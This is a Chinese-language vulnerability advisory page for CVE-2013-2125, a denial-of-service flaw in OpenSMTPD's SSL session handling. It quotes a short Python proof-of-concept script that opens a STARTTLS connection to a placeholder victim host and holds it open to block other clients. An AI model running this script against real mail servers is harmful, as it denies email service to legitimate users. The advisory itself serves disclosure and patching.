Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / OpenSMTPD SSL会话处理拒绝服务漏洞

发布日期:2013-05-21
更新日期:2013-05-23受影响系统:
opensmtpd opensmtpd 5.x
描述:
--------------------------------------------------------------------------------
CVE(CAN) ID: CVE-2013-2125
 
OpenSMTPD是RFC 5321定义的服务器端SMTP协议的自由实现。
 
OpenSMTPD 5.3.1在处理SSL会话时错误地配置了blocking模式中的套接字,攻击者通过保持套接字的开放状态,即可导致停止服务接收电子邮件。
 
<*来源:Jason Donenfeld (Jason@zx2c4.com)
 
 链接:http://secunia.com/advisories/53353/
       http://seclists.org/oss-sec/2013/q2/362
 *>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Jason Donenfeld (Jason@zx2c4.com)提供了如下测试方法:
 
    #!/usr/bin/env python2
   import smtplib
   import time
   print "[+] Connecting to server and initiating TLS"
   smtp = smtplib.SMTP("mail.some-vitim-host.blah", 587)
   smtp.starttls()
   print "[+] No clients will be able to connect as long as this remains open."
   time.sleep(100000000)建议:
--------------------------------------------------------------------------------
厂商补丁:
 
opensmtpd
 ---------
 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
 
http://www.opensmtpd.org/Invision Power Board Admin帐号接管命令执行漏洞Microsoft Windows Kernel “win32k.sys” win32k!EPATHOBJ::pprFlattenRec权限相关资讯      OpenSMTPD 
  • OpenSMTPD释放后重利用漏洞(CVE-  (10/21/2015 17:33:00)
本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论即表明您已经阅读并接受上述条款